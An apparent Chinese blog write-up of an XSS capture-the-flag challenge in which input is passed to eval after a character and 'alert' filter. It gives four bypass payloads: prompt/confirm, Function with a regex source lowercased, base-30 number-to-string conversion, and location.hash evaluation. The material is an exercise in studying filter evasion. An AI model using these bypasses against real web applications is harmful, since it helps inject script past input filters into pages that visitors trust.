目录
一、题目
/* Challenge */
mafia = (new URL(location).searchParams.get('mafia') || '1+1')
mafia = mafia.slice(0, 50)
mafia = mafia.replace(/[\`\'\"\+\-\!\\\[\]]/gi, '_')
mafia = mafia.replace(/alert/g, '_')
eval(mafia)二、思考
正则表达式对`、;、"、+、-、!、\、[、]符号进行了过滤,并把alert这个函数也过滤了。
思路一:首先考虑的是否拥有alert相似函数,可以使用prompt函数和confirm函数。它们都可以弹出对话框以造成差不多的作用
思路二:使用Funciton构造函数,配合正则表达式以及source属性将正则转换成字符串后,使用toLowerCase方法转小写,即可绕过alert的过滤
思路三:利用进制转换来绕过函数名的过滤
思路四:利用localtionn.hash来绕过
三、payload
3.1 方案一
prompt(1337);
confirm(1337);
3.2 方案二
Function(/ALERT(1337)/.source.toLowerCase())()
3.3 方案三
eval(8680439..toString(30))(1337)
3.4 方案四
eval(location.hash.slice(1))#alert(1)
四、思考与总结
正则对于函数名进行过滤,绕过该WAF一共使用了三种方法,分别为
- 正则表达式的source属性与toLowerCase搭配绕过
- parseInt与toString转进制绕过
- location.hash绕过
使用source与toLowerCase来进行绕过,只能针对过滤函数名为全小写的情况,当函数名中即拥有小写字母也拥有大写字母时,作用不会太大。因此相比较之下方法二与方法三的使用范围会大些。
357
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
